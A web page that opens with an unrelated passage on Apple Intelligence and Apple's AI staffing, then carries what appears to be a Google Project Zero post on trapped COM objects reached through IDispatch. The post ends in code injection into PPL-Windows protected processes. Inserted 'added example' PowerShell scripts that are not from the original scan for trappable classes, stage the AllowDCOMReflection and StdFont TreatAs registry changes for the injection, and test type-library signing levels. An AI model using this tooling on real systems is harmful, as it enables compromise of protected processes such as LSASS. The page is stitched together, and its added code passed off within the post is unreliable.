Put it all together and it’s clear that Vorrath is one of Apple’s top fixers and joins the AI team at a critical point. First, she’s probably going to help get a new contextually-aware Siri out the door, and second, she’ll be making decisions around what happens in the next major iterations of Apple Intelligence.

It’s the next steps for Apple’s AI that I think have been missed in much of the coverage of this internal Apple shuffle. 

Apple Intelligence 2.0

While people like to focus on Siri’s improvements and shortcomings, it must also be true that Apple hopes to maintain its traditional development cadence when it comes to Apple Intelligence.

That means delivering additional features and feature improvements every year, usually at WWDC. With the next WWDC looming fast, it might fall to Vorrath to select what additions are made, and to ensure they get developed on time.

Think logically and you can see why that matters. Apple announced Apple Intelligence at WWDC 2024, but it wasn’t ready to ship alongside the original release of operating system updates, and features were slowly introduced in the following months. 

Arguably, the schedule didn’t matter. What does matter is that Apple, then seen as falling behind in AI, used Apple intelligence to argue for its own continued corporate relevance. It bought itself some time.

Now it must follow up on that time. That means making improvements and additions to show continued momentum. It comes down to delivering solutions consumers will want to use, with a little Apple magic alongside new developer tools to extend that ecosystem.

It has to succeed in doing this to maintain credibility in AI.

Is Apple going to keep relevant?

Getting that right — particularly across all Apple’s platforms and in good time — is challenging, and is most likely why Vorrath has been brought in. There’s so much riding on getting the mix right. Apple needs to be able to say “Hey, we’re not done yet with Apple Intelligence,” and back that claim up with tools to keep users’ interest. Those new AI services need to work well, ship on time, and work so people won’t even know how much they needed them until they use them.

Getting that mix right is going to take skill, dedication, and discipline. In the coming months, all eyes will be on Apple as critics and competitors wait to find out whether Apple Intelligence was a one shot attempt at maintaining relevance, or the first steps of a great company about to find its AI feet.

Making sure it is the second, and not the first, should be the fundamental mission Vorrath has taken on in her new role. 

Category: Hacking & Security

Windows Bug Class: Accessing Trapped COM Objects with IDispatch

Project Zero - 30 January 2025 - 18:57
Posted by James Forshaw, Google Project Zero

Object orientated remoting technologies such as DCOM and .NET Remoting make it very easy to develop an object-orientated interface to a service which can cross process and security boundaries. This is because they're designed to support a wide range of objects, not just those implemented in the service, but any other object compatible with being remoted. For example, if you wanted to expose an XML document across the client-server boundary, you could use a pre-existing COM or .NET library and return that object back to the client. By default when the object is returned it's marshaled by reference, which results in the object staying in the out-of-process server.

This flexibility has a number of downsides, one of which is the topic of this blog, the trapped object bug class. Not all objects which can be remoted are necessarily safe to do so. For example, the previously mentioned XML libraries, in both COM and .NET, support executing arbitrary script code in the context of an XSLT document. If an XML document object is made accessible over the boundary, then the client could execute code in the context of the server process, which can result in privilege escalation or remote-code execution.

There are a number of scenarios that can introduce this bug class. The most common is where an unsafe object is shared inadvertently. An example of this was CVE-2019-0555. This bug was introduced because when developing the Windows Runtime libraries an XML document object was needed. The developers decided to add some code to the existing XML DOM Document v6 COM object which exposed the runtime specific interfaces. As these runtime interfaces didn't support the XSLT scripting feature, the assumption was this was safe to expose across privilege boundaries. Unfortunately a malicious client could query for the old IXMLDOMDocument interface which was still accessible and use it to run an XSLT script and escape a sandbox.

Another scenario is where there exists an asynchronous marshaling primitive. This is where an object can be marshaled both by value and by reference and the platform chooses by reference as the default mechanism. For example, the FileInfo and DirectoryInfo .NET classes are both serializable, so they can be sent to a .NET remoting service marshaled by value. But they also derive from the MarshalByRefObject class, which means they can be marshaled by reference. An attacker can leverage this by sending to the server a serialized form of the object which, when deserialized, will create a new instance of the object in the server's process. If the attacker can read back the created object, the runtime will marshal it back to the attacker by reference, leaving the object trapped in the server process. Finally the attacker can call methods on the object, such as creating new files, which will execute with the privileges of the server. This attack is implemented in my ExploitRemotingService tool.

The final scenario I'll mention, as it has the most relevance to this blog post, is abusing the built-in mechanisms the remoting technology uses to look up and instantiate objects in order to create an unexpected object. For example, in COM if you can find a code path to call the CoCreateInstance API with an arbitrary CLSID and get that object passed back to the client, then you can use it to run arbitrary code in the context of the server. An example of this form is CVE-2017-0211, which was a bug that exposed a Structured Storage object across a security boundary. The storage object supports the IPropertyBag interface, which can be used to create an arbitrary COM object in the context of the server and get it returned to the client. This could be exploited by getting an XML DOM Document object created in the server, returned to the client marshaled by reference, and then using the XSLT scripting feature to run arbitrary code in the context of the server to elevate privileges.

Where Does IDispatch Fit In?

The IDispatch interface is part of the OLE Automation feature, which was one of the original use cases for COM. It allows for late binding of a COM client to a server, so that the object can be consumed from scripting languages such as VBA and JScript. The interface is fully supported across process and privilege boundaries, although it's more commonly used for in-process components such as ActiveX.

To facilitate calling a COM object at runtime the server must expose some type information to the client so that it knows how to package up parameters to send via the interface's Invoke method. The type information is stored in a developer-defined Type Library file on disk, and the library can be queried by the client using the IDispatch interface's GetTypeInfo method. As the COM implementation of the type library interface is marshaled by reference, the returned ITypeInfo interface is trapped in the server and any methods called upon it will execute in the server's context.

The ITypeInfo interface exposes two interesting methods that can be called by a client, Invoke and CreateInstance. It turns out Invoke is not that useful for our purposes: it's not supported for remoting and can only be called if the type library is loaded in the current process. However, CreateInstance is implemented as remotable; it will instantiate a COM object from a CLSID by calling CoCreateInstance. Crucially the created object will be in the server's process, not the client's.

However, if you look at the linked API documentation there is no CLSID parameter you can pass to CreateInstance, so how does the type library interface know what object to create? The ITypeInfo interface represents any type which can be present in a type library. The type returned by GetTypeInfo just contains information about the interface the client wants to call, therefore calling CreateInstance will just return an error. However, the type library can also store information of "CoClass" types. These types define the CLSID of the object to create, and so calling CreateInstance will succeed.

How can we go from the interface type information object, to one representing a class? The ITypeInfo interface provides us with the GetContainingTypeLib method which returns a reference to the containing ITypeLib interface. That can then be used to enumerate all supported classes in the type library. It's possible one or more of the classes are not safe if exposed remotely. Let's go through a worked example using my OleView.NET PowerShell module, first we want to find some target COM services which also support IDispatch. This will give us potential routes for privilege escalation.

PS> $cls = Get-ComClass -Service
PS> $cls | % { Get-ComInterface -Class $_ | Out-Null }
PS> $cls | ? { $true -in $_.Interfaces.InterfaceEntry.IsDispatch } | 
        Select Name, Clsid

Name                                       Clsid
----                                       -----
WaaSRemediation                            72566e27-1abb-4eb3-b4f0-eb431cb1cb32
Search Gathering Manager                   9e175b68-f52a-11d8-b9a5-505054503030
Search Gatherer Notification               9e175b6d-f52a-11d8-b9a5-505054503030
AutomaticUpdates                           bfe18e9c-6d87-4450-b37c-e02f0b373803
Microsoft.SyncShare.SyncShareFactory Class da1c0281-456b-4f14-a46d-8ed2e21a866f

The -Service switch for Get-ComClass returns classes which are implemented in local services. We then query for all the supported interfaces; we don't need the output from this command as the queried interfaces are stored in the Interfaces property. Finally we select out any COM class which exposes IDispatch, resulting in 5 candidates. Next, we'll pick the first class, WaaSRemediation, and inspect its type library for interesting classes.

PS> $obj = New-ComObject -Clsid 72566e27-1abb-4eb3-b4f0-eb431cb1cb32
PS> $lib = Import-ComTypeLib -Object $obj
PS> Get-ComObjRef $lib.Instance | Select ProcessId, ProcessName

ProcessId ProcessName
--------- -----------
    27020 svchost.exe

PS> $parsed = $lib.Parse()
PS> $parsed

Name               Version TypeLibId
----               ------- ---------
WaaSRemediationLib 1.0     3ff1aab8-f3d8-11d4-825d-00104b3646c0

PS> $parsed.Classes | Select Name, Uuid

Name                          Uuid
----                          ----
WaaSRemediationAgent          72566e27-1abb-4eb3-b4f0-eb431cb1cb32
WaaSProtectedSettingsProvider 9ea82395-e31b-41ca-8df7-ec1cee7194df

The script creates the COM object and then uses the Import-ComTypeLib command to get the type library interface. We can check that the type library interface is really running out of process by marshaling it with Get-ComObjRef and extracting the process information, which shows it running in an instance of svchost.exe, the shared service executable. Inspecting the type library through the raw interface is painful; to make it easier to display what classes are supported, we can parse the library into an easier to use object model with the Parse method. We can then dump information about the library, including a list of its classes.

Unfortunately for this COM object the only classes the type library supports are already registered to run in the service and so we've gained nothing. What we need is a class that is only registered to run in the local process, but is exposed by the type library. This is a possibility as a type library could be shared by both local in-process components and an out-of-process service.

I inspected the other 4 COM classes (one of which is incorrectly registered and isn't exposed by the corresponding service) and found no useful classes to try and exploit. You might decide to give up at this point, but it turns out there are some classes accessible, they're just hidden. This is because a type library can reference other type libraries, which can be inspected using the same set of interfaces. Let's take a look:

PS> $parsed.ReferencedTypeLibs

Name   Version TypeLibId
----   ------- ---------
stdole 2.0     00020430-0000-0000-c000-000000000046

PS> $parsed.ReferencedTypeLibs[0].Parse().Classes | Select Name, Uuid

Name       Uuid
----       ----
StdFont    0be35203-8f91-11ce-9de3-00aa004bb851
StdPicture 0be35204-8f91-11ce-9de3-00aa004bb851

PS> $cls = Get-ComClass -Clsid 0be35203-8f91-11ce-9de3-00aa004bb851
PS> $cls.Servers

           Key Value
           --- -----
InProcServer32 C:\Windows\System32\oleaut32.dll

In the example we use the ReferencedTypeLibs property to show what type libraries were encountered when the library was parsed. We can see a single entry, for stdole, which is basically always going to be imported. If you're lucky, maybe there are other imported libraries you can inspect. We can parse the stdole library to inspect its list of classes. There are two classes exported by the type library; if we inspect the servers for StdFont we can see that it is only specified to be creatable in process, so we now have a target class to look for bugs. To get an out of process interface for the stdole type library we need to find a type which references it. Such a reference always exists because common interfaces such as IUnknown and IDispatch are defined in that library, so we can query the base type of an interface we can directly access. Let's try to create the object in the COM service.

PS> $iid = $parsed.Interfaces[0].Uuid
PS> $ti = $lib.GetTypeInfoOfGuid($iid)
PS> $href = $ti.GetRefTypeOfImplType(0)
PS> $base = $ti.GetRefTypeInfo($href)
PS> $stdole = $base.GetContainingTypeLib()
PS> $stdole.Parse()

Name   Version TypeLibId
----   ------- ---------
stdole 2.0     00020430-0000-0000-c000-000000000046

PS> $ti = $stdole.GetTypeInfoOfGuid("0be35203-8f91-11ce-9de3-00aa004bb851")
PS> $font = $ti.CreateInstance()
PS> Get-ComObjRef $font | Select ProcessId, ProcessName

ProcessId ProcessName
--------- -----------
    27020 svchost.exe

PS> Get-ComInterface -Object $font

Name                 IID                                  HasProxy   HasTypeLib
----                 ---                                  --------   ----------
...
IFont                bef6e002-a874-101a-8bba-00aa00300cab True       False
IFontDisp            bef6e003-a874-101a-8bba-00aa00300cab True       True

We query the base type of an existing interface through a combination of GetRefTypeOfImplType and GetRefTypeInfo, then use GetContainingTypeLib to get the referenced type library interface. We can parse the library to be confident that we've got the stdole library. Next we get the type info for the StdFont class and call CreateInstance. We can inspect the object's process to ensure it was created out of process; the result shows it's trapped in the service process. As a final check we can query the object's interfaces to prove that it's a font object.
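The hunt above was done by hand for one service. The following function, an added example rather than code from the original post, generalizes it over every out-of-process class that exposes IDispatch: it imports each service's type library, confirms the ITypeLib interface is really remoted, walks the library and the libraries it references (stdole at minimum), and reports coclasses whose registration is in-process only. It assumes the OleView.NET PowerShell module is imported and a COM database is loaded (for instance via Get-ComDatabase -SetCurrent); the cmdlets and properties it uses are the ones the post's own commands use.

```powershell
# Added example, not code from the original post: find in-process-only COM classes that a
# remoted type library would let us instantiate inside a service via ITypeInfo::CreateInstance.
# Assumes the OleView.NET module is imported and a COM database is loaded
# (e.g. Get-ComDatabase -SetCurrent).
function Find-TrappableTypeLibClass {
    [CmdletBinding()]
    param(
        # Report every coclass found rather than only the in-process-only ones.
        [switch]$IncludeAll
    )

    $services = Get-ComClass -Service
    # Populate the Interfaces property so we can filter on IDispatch support.
    $services | ForEach-Object { Get-ComInterface -Class $_ | Out-Null }
    $dispatchServices = $services | Where-Object { $true -in $_.Interfaces.InterfaceEntry.IsDispatch }

    foreach ($svc in $dispatchServices) {
        try {
            $obj = New-ComObject -Clsid $svc.Clsid
            $lib = Import-ComTypeLib -Object $obj
        } catch {
            # Misregistered or inaccessible service (the post found one of these).
            Write-Verbose "Skipping $($svc.Name): $($_.Exception.Message)"
            continue
        }

        # CreateInstance only helps if the type library interface lives in the service;
        # if it was loaded into our own process there is nothing to trap.
        $ref = Get-ComObjRef $lib.Instance
        if ($ref.ProcessId -eq $PID) {
            Write-Verbose "Type library for $($svc.Name) is in-process, skipping"
            continue
        }

        $parsed = $lib.Parse()
        # Hidden classes live in referenced libraries, so walk those as well.
        $libs = @($parsed) + @($parsed.ReferencedTypeLibs | ForEach-Object { $_.Parse() })
        foreach ($tl in $libs) {
            foreach ($coclass in $tl.Classes) {
                $reg = Get-ComClass -Clsid $coclass.Uuid
                if ($null -eq $reg) { continue }
                # Servers is keyed by server type (InProcServer32, LocalServer32, ...).
                $serverTypes = @($reg.Servers.Keys | ForEach-Object { "$_" })
                $inProcOnly = ($serverTypes -contains 'InProcServer32') -and
                              ($serverTypes -notcontains 'LocalServer32')
                if (-not $IncludeAll -and -not $inProcOnly) { continue }
                [pscustomobject]@{
                    Service     = $svc.Name
                    HostProcess = "$($ref.ProcessName) ($($ref.ProcessId))"
                    TypeLib     = $tl.Name
                    Class       = $coclass.Name
                    Clsid       = $coclass.Uuid
                    Servers     = ($serverTypes -join ', ')
                    InProcOnly  = $inProcOnly
                }
            }
        }
    }
}

# Usage: on the machine from the post this lists stdole's StdFont and StdPicture reached
# through WaaSRemediationAgent, plus anything other IDispatch services expose.
Find-TrappableTypeLibClass -Verbose | Format-Table -AutoSize
```

A class showing up here is only a candidate: as the post goes on to show, the object may still refuse to work out of process (StdPicture) or simply have no exploitable behaviour (StdFont), so each hit needs the CreateInstance and Get-ComObjRef check from the session above before spending time on it.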

Now we just need to find a way of exploiting one of these two classes, the first problem is only the StdFont object can be accessed. The StdPicture object does a check to prevent it being used out of process. I couldn't find useful exploitable behavior in the font object, but I didn't spend too much time looking. Of course, if anyone else wants to look for a suitable bug in the class then go ahead.

This research was therefore at a dead end, at least as far as system services go. There might be some COM server accessible from a sandbox but an initial analysis of ones accessible from AppContainer didn't show any obvious candidates. However, after thinking a bit more about this I realized it could be useful as an injection technique into a process running at the same privilege level. For example, we could hijack the COM registration for StdFont, to point to any other class using the TreatAs registry key. This other class would be something exploitable, such as loading the JScript engine into the target process and running a script.

Still, injection techniques are not something I'd usually discuss on this blog, that's more in the realm of malware. However, there is a scenario where it might have interesting security implications. What if we could use this to inject into a Windows Protected Process? In a strange twist of fate, the WaaSRemediationAgent class we've just been inspecting might just be our ticket to ride:

PS> $cls = Get-ComClass -Clsid 72566e27-1abb-4eb3-b4f0-eb431cb1cb32
PS> $cls.AppIDEntry.ServiceProtectionLevel
WindowsLight

When we inspect the protection level for the hosting service it's configured to run at the PPL-Windows level! Let's see if we can salvage some value out of this research.

Protected Process Injection

I've blogged (and presented) on the topic of injecting into Windows Protected Processes before. I'd recommend re-reading that blog post to get a better background of previous injection attacks. However, one key point is that Microsoft does not consider PPL a security boundary and so they won't generally fix any bugs in a security bulletin in a timely manner, but they might choose to fix it in a new version of Windows.

The idea is simple: we'll redirect the StdFont class registration to point to another class so that when we create it via the type library it'll be running in the protected process. Choosing to use StdFont should be more generic, as we could move to using a different COM server if WaaSRemediationAgent is removed. We just need a suitable class which gets us arbitrary code execution and which also works in a protected process.

Unfortunately this immediately rules out any of the scripting engines like JScript. If you've re-read my last blog post, the Code Integrity module explicitly blocks the common script engines from loading in a protected process. Instead, I need a class which is accessible out of process and can be loaded into a protected process. I realized one option is to load a registered .NET COM class. I've blogged about how .NET DCOM is exploitable, and shouldn't be used, but in this case we want the bugginess.

The blog post discussed exploiting serialization primitives, however there was a much simpler attack which I exploited by using the System.Type class over DCOM. With access to a Type object you could perform arbitrary reflection and call any method you liked, including loading an assembly from a byte array which would bypass the signature checking and give full control over the protected process.

Microsoft fixed this behavior, but they left a configuration value, AllowDCOMReflection, which allows you to turn it back on again. As we're not elevating privileges, and we have to be running as an administrator to change the COM class registration information, we can just enable DCOM reflection in the registry by writing the AllowDCOMReflection with the DWORD value of 1 to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework key before loading the .NET framework into the protected process.

The following steps need to be taken to achieve injection:

  1. Enable DCOM reflection in the registry.
  2. Add the TreatAs key to redirect StdFont to the System.Object COM class.
  3. Create the WaaSRemediationAgent object.
  4. Use the type library to get the StdFont class type info.
  5. Create a StdFont object using the CreateInstance method which will really load the .NET framework and return an instance of the System.Object class.
  6. Use .NET reflection to call the System.Reflection.Assembly::Load method with a byte array.
  7. Create an object in the loaded assembly to force code to execute.
  8. Cleanup all registry changes.
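The registry side of that procedure (steps 1, 2 and 8) can be staged and undone from PowerShell; the script below is an added example and is not the post's PoC. The reflection calls themselves (steps 3 to 7) must come from a non-.NET client, as the post explains, so they are not shown here. It assumes an elevated 64-bit PowerShell session, that the .NET Framework has registered the System.Object ProgID (the CLSID is resolved from the registry rather than hard-coded), that StdFont's CLSID is the one found above, and the name of the injection client it invokes is hypothetical.

```powershell
# Added example, not the post's PoC: stage and undo the registry changes the injection needs.
# Assumptions: elevated 64-bit PowerShell; System.Object ProgID registered by .NET Framework;
# StdFont CLSID as found in the post; the client executable name is hypothetical.
$StdFontClsid = '{0be35203-8f91-11ce-9de3-00aa004bb851}'
$NetFxKey     = 'HKLM:\SOFTWARE\Microsoft\.NETFramework'
$TreatAsKey   = "HKLM:\SOFTWARE\Classes\CLSID\$StdFontClsid\TreatAs"

function Get-SystemObjectClsid {
    # Resolve the CLSID the .NET Framework registered for System.Object via its ProgID.
    $key = 'HKLM:\SOFTWARE\Classes\System.Object\CLSID'
    if (-not (Test-Path $key)) {
        throw 'System.Object ProgID is not registered; is the .NET Framework installed?'
    }
    (Get-ItemProperty -Path $key).'(default)'
}

function Enable-Injection {
    $target = Get-SystemObjectClsid
    # Step 1: turn DCOM reflection back on (Microsoft's fix left this switch in place).
    New-ItemProperty -Path $NetFxKey -Name AllowDCOMReflection -PropertyType DWord -Value 1 -Force | Out-Null
    # Step 2: TreatAs redirects every activation of StdFont, including the one
    # ITypeInfo::CreateInstance performs inside the protected service, to System.Object.
    # Remember any existing redirection so that cleanup restores it exactly.
    $previous = $null
    if (Test-Path $TreatAsKey) {
        $previous = (Get-ItemProperty -Path $TreatAsKey).'(default)'
    } else {
        New-Item -Path $TreatAsKey | Out-Null
    }
    Set-ItemProperty -Path $TreatAsKey -Name '(default)' -Value $target
    [pscustomobject]@{ Target = $target; PreviousTreatAs = $previous }
}

function Disable-Injection {
    param([string]$PreviousTreatAs)
    # Step 8: put both keys back the way they were.
    Remove-ItemProperty -Path $NetFxKey -Name AllowDCOMReflection -ErrorAction SilentlyContinue
    if ($PreviousTreatAs) {
        Set-ItemProperty -Path $TreatAsKey -Name '(default)' -Value $PreviousTreatAs
    } else {
        Remove-Item -Path $TreatAsKey -Recurse -ErrorAction SilentlyContinue
    }
}

# Usage: stage, run the non-.NET client that performs steps 3 to 7, then always clean up.
$state = Enable-Injection
try {
    & '.\inject_client.exe'   # hypothetical C++ client, not provided here
} finally {
    Disable-Injection -PreviousTreatAs $state.PreviousTreatAs
}
```

Two caveats from the rest of the post apply on top of this: on Windows 11 24H2 the mscorlib type library registration also has to be repointed at the 32-bit (Framework) mscorlib.tlb, and the same two changes can be made under the current user's registration hive instead of HKLM if the goal is to reach a PPL without administrator rights.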

You'll need to do these steps in a non-.NET language, as otherwise the serialization mechanisms will kick in and recreate the reflection objects in the calling process. I wrote my PoC in C++, but you can probably do it from things like Python if you're so inclined. I'm not going to make the PoC available but the code is very similar to the exploit I wrote for CVE-2014-0257, which will give you an example of how to use DCOM reflection in C++. Also note that the default for .NET COM objects is to run them using the v2 framework, which is no longer installed by default. Rather than mess around with getting this working with v4 I just installed v2 from the Windows components installer.

My PoC worked first time on Windows 10, but unfortunately when I ran it on Windows 11 24H2 it failed. I could create the .NET object, but calling any method on the object failed with the error TYPE_E_CANTLOADLIBRARY. I could have stopped here, having proven my point, but I wanted to know what was failing on Windows 11. Let's finish up by diving into that, to see if we could do something to get it to work on the latest version of Windows.

The Problem with Windows 11

I was able to prove that the issue was related to protected processes, if I changed the service registration to run unprotected then the PoC worked. Therefore there must be something blocking the loading of the library when specifically running in a protected process. This didn't seem to impact type libraries generally, the loading of stdole worked just fine, so it was something specific to .NET.

After inspecting the behavior of the PoC with Process Monitor it was clear the mscorlib.tlb library was being loaded to implement the stub class in the server. For some reason it failed to load, which prevented the stub from being created, which in turn caused any call to fail. At this point I had an idea of what's happening. In the previous blog post I discussed attacking the NGEN COM process by modifying the type library it used to create the interface stub to introduce a type-confusion. This allowed me to overwrite the KnownDlls handle and force an arbitrary DLL to get loaded into memory. I knew from the work of Clément Labro and others that most of the attacks around KnownDlls are now blocked, but I suspected that there was also some sort of fix for the type library type-confusion trick.

Digging into oleaut32.dll I found the offending fix, the VerifyTrust method is shown below:

NTSTATUS VerifyTrust(LoadInfo *load_info) {
  PS_PROTECTION protection;
  BOOL is_protected;

  // Only enforced when the calling process is protected.
  CheckProtectedProcessForHardening(&is_protected, &protection);
  if (!is_protected)
    return SUCCESS;
  ULONG flags;
  BYTE level;
  HANDLE handle = load_info->Handle;
  NTSTATUS status = NtGetCachedSigningLevel(handle, &flags, &level, 
                                            NULL, NULL, NULL);
  // 12 is the Windows signing level. If there is no usable cached level,
  // or it is below Windows, try to set one; failure fails the load.
  if (FAILED(status) || 
     (flags & 0x182) == 0 || 
     FAILED(NtCompareSigningLevels(level, 12))) {
    status = NtSetCachedSigningLevel(0x804, 12, &handle, 1, handle);
  }
  return status;
}

This method is called during the loading of the type library. It's using the cached signing level, again something I mentioned in the previous blog post, to verify if the file has a signing level of 12, which corresponds to Windows signing level. If it doesn't have the appropriate cached signing level the code will try to use NtSetCachedSigningLevel to set it. If that fails it assumes the file can't be loaded in the protected process and returns the error, which results in the type library failing to load. Note, a similar fix blocks the abuse of the Running Object Table to reference an out-of-process type library, but that's not relevant to this discussion.

Based on the output from Get-AuthenticodeSignature the mscorlib.tlb file is signed, admittedly via a catalog signature. The signing certificate is Microsoft Windows Production PCA 2011, which is exactly the same certificate as the .NET Runtime DLL, so there should be no reason it wouldn't get a Windows signing level. Let's try and set the cached signing level manually using my NtObjectManager PowerShell module to see if we get any insights:

PS> $path = "C:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.tlb"
PS> Set-NtCachedSigningLevel $path -Flags 0x804 -SigningLevel 12 -Win32Path
Exception calling "SetCachedSigningLevel" with "4" argument(s): "(0xC000007B) - {Bad Image}
%hs is either not designed to run on Windows or it contains an error. Try installing the program again using the
original installation media or contact your system administrator or the software vendor for support. Error status 0x"
PS> Format-HexDump $path -Length 64 -ShowAll
          00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F  - 0123456789ABCDEF
-----------------------------------------------------------------------------
00000000: 4D 53 46 54 02 00 01 00 00 00 00 00 09 04 00 00  - MSFT............
00000010: 00 00 00 00 43 00 00 00 02 00 04 00 00 00 00 00  - ....C...........
00000020: 25 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00  - %...............
00000030: 2E 0D 00 00 33 FA 00 00 F8 08 01 00 FF FF FF FF  - ....3...........

Setting the signing level gives us the STATUS_INVALID_IMAGE_FORMAT error. Looking at the first 64 bytes of the type library file shows that it's a raw type library rather than one packaged in a PE file. This is fairly uncommon on Windows; even when a file has the extension TLB it's common for the type library to still be packed into a PE file as a resource. I guess we're out of luck: unless we can set a cached signing level on the file it will be blocked from loading into the protected process, and we need it to load to support the stub class to call the .NET interfaces over DCOM.

As an aside, oddly I have a VM of Windows 11 with the non-DLL form of the type library which does work to set a cached signing level. I must have changed the VM's configuration in some way to support this feature, but I've no idea what that is and I've decided not to dig further into it.

We could try and find a previous version of the type library file which is both validly signed and packaged in a PE file; however, I'd rather not do that. Of course there's almost certainly another COM object we could load rather than .NET which might give us arbitrary code execution, but I'd set my heart on this approach. In the end the solution was simpler than I expected: for some reason the 32 bit version of the type library file (i.e. in Framework rather than Framework64) is packed in a DLL, and we can set a cached signing level on it.

PS> $path = "C:\windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlb"
PS> Format-HexDump $path -Length 64 -ShowAll
          00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F  - 0123456789ABCDEF
-----------------------------------------------------------------------------
00000000: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00  - MZ..............
00000010: B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  - ........@.......
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  - ................
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 B8 00 00 00  - ................
PS> Set-NtCachedSigningLevel $path -Flags 0x804 -SigningLevel 12 -Win32Path
PS> Get-NtCachedSigningLevel $path -Win32Path

Flags               : TrustedSignature
SigningLevel        : Windows
Thumbprint          : B9590CE5B1B3F377EAA6F455574C977919BB785F12A444BEB2...
ThumbprintBytes     : {185, 89, 12, 229...}
ThumbprintAlgorithm : Sha256

Thus to exploit on Windows 11 24H2 we can swap the type library registration path from the 64 bit version to the 32 bit version and rerun the exploit. The VerifyTrust function will automatically set the cached signing level for us so we don't need to do anything to make it work. Even though it's technically a different version of the type library, it doesn't make any difference for our use case and the stub generator code doesn't care.
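The two manual checks above (is the file a raw MSFT type library or a PE image, and can it carry a Windows cached signing level) can be folded into one function that classifies any .tlb the way oleaut32's VerifyTrust will see it in a protected process. This is an added example, not from the post. It uses NtObjectManager's Get-NtCachedSigningLevel and Set-NtCachedSigningLevel as the post does, with the flags value 0x804 and level 12 taken from the VerifyTrust listing; it assumes NtObjectManager is imported and, for -Attempt, that the caller has the access needed to set a cached signing level on the file, as VerifyTrust does in the service. The SLTG magic is the older raw type library format and is treated the same as MSFT.

```powershell
# Added example, not from the post: decide whether a type library can pass VerifyTrust in a
# protected process. Only a PE-packaged library with a Windows (12) cached signing level can.
# Assumes the NtObjectManager module is imported.
function Test-TypeLibPplLoadable {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline, ValueFromPipelineByPropertyName)]
        [Alias('FullName')]
        [string]$Path,
        # Try to set the cached signing level when it is missing, as VerifyTrust would.
        [switch]$Attempt
    )
    process {
        # Read only the magic: MSFT and SLTG are raw type library formats, MZ is a PE image.
        $fs = [System.IO.File]::OpenRead($Path)
        try {
            $hdr = New-Object byte[] 4
            [void]$fs.Read($hdr, 0, 4)
        } finally {
            $fs.Dispose()
        }
        $magic = [System.Text.Encoding]::ASCII.GetString($hdr)
        $format = 'Unknown'
        if ($magic -eq 'MSFT' -or $magic -eq 'SLTG') { $format = 'RawTypeLib' }
        elseif ($magic.StartsWith('MZ')) { $format = 'PE' }

        $level = $null
        $err = $null
        try {
            $level = Get-NtCachedSigningLevel $Path -Win32Path
        } catch {
            $err = $_.Exception.Message
        }
        $isWindows = ($null -ne $level) -and ("$($level.SigningLevel)" -eq 'Windows')

        if ($Attempt -and -not $isWindows) {
            try {
                # Same call VerifyTrust makes; raw files fail with STATUS_INVALID_IMAGE_FORMAT.
                Set-NtCachedSigningLevel $Path -Flags 0x804 -SigningLevel 12 -Win32Path
                $level = Get-NtCachedSigningLevel $Path -Win32Path
                $isWindows = "$($level.SigningLevel)" -eq 'Windows'
                $err = $null
            } catch {
                $err = $_.Exception.Message
            }
        }

        $levelName = $null
        if ($null -ne $level) { $levelName = "$($level.SigningLevel)" }
        [pscustomobject]@{
            Path         = $Path
            Format       = $format
            SigningLevel = $levelName
            PplLoadable  = ($format -eq 'PE' -and $isWindows)
            Error        = $err
        }
    }
}

# Usage: compare the two mscorlib.tlb files discussed above; only the Framework (32-bit)
# copy should come back as PE with a Windows level and PplLoadable = True.
'C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlb',
'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.tlb' |
    Test-TypeLibPplLoadable -Attempt | Format-Table -AutoSize
```

Piping `Get-ChildItem C:\Windows -Recurse -Filter *.tlb` into the function is a quick way to see how rare raw MSFT files are on a given build, and which PE-packaged libraries a protected process would accept.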

Conclusions

I discussed in this blog post an interesting type of bug class on Windows, although it is applicable to any similar object-oriented cross-process or remoting protocol. It shows how you can get a COM object trapped in a more privileged process by exploiting a feature of OLE Automation, specifically the IDispatch interface and type libraries.

While I wasn't able to demonstrate a privilege escalation, I showed how you can use the IDispatch interface exposed by the WaaSRemediationAgent class to inject code into a PPL-Windows process. While this isn't the highest possible protection level, it allows access to the majority of processes running as protected, including LSASS. We saw that Microsoft has done some work to try and mitigate existing attacks such as type library type-confusions, but in our case this mitigation shouldn't have blocked the load as we didn't need to change the type library itself. While the attack required admin privilege, the general technique does not. You could modify the local user's registration for COM and .NET to do the attack as a normal user to inject into a PPL if you can find a suitable COM server exposing IDispatch.
